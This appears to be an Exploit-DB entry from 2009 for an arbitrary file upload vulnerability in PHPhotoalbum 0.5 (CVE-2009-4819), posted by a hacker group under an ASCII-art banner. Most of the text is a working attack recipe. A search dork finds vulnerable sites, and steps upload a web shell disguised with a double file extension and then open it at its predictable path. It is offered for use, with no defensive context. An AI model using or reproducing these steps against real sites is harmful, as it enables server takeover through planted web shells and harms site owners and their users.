PHPhotoalbum - Arbitrary File Upload
Author: wlhaan hacker
type: webapps
platform: php
port:
date_added: 2009-12-20
date_updated:
verified: 1
codes: OSVDB-64124;CVE-2009-4819
tags:
aliases:
screenshot_url:
application_url: http://www.exploit-db.comPHPhotoalbum-0.5.zip
|| || | ||
o_,_7 _|| . _o_7 _|| 4_|_|| o_w_,
( : / (_) / ( .
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
| _ __ __ __ ______ |
| /' \ __ /'__`\ /\ \__ /'__`\ /\ ___\ |
| /\_, \ ___ /\_\/\_\L\ \ ___\ \ ,_\/\ \/\ \ _ __\ \ \__/ |
| \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ \___``\ |
| \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ |
| \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ \ \____/ |
| \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ \/___/ |
| \ \____/ >> team wlhaan hacker |
| \/___/ |
| |
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
==========================================================================
~ Script Name : PHPhotoalbum)
~ Language : php
~
~ email: iit@hotmail.com
~
============================================================
Dork : Powered By PHPhotoalbum
or
inurl:"PHPhotoalbum-upload.php"
============================================================
Exploit :
http://{server/script path/upload.php
chang shell
shell.php.pgif
or
shell.php.pjpeg
go to shell
http://server/script path/albums/userpics/shell.php.pgif
============================================================
thank you for
shooq hacker
============================================================
www.sa-hacker.com/vb
============================================================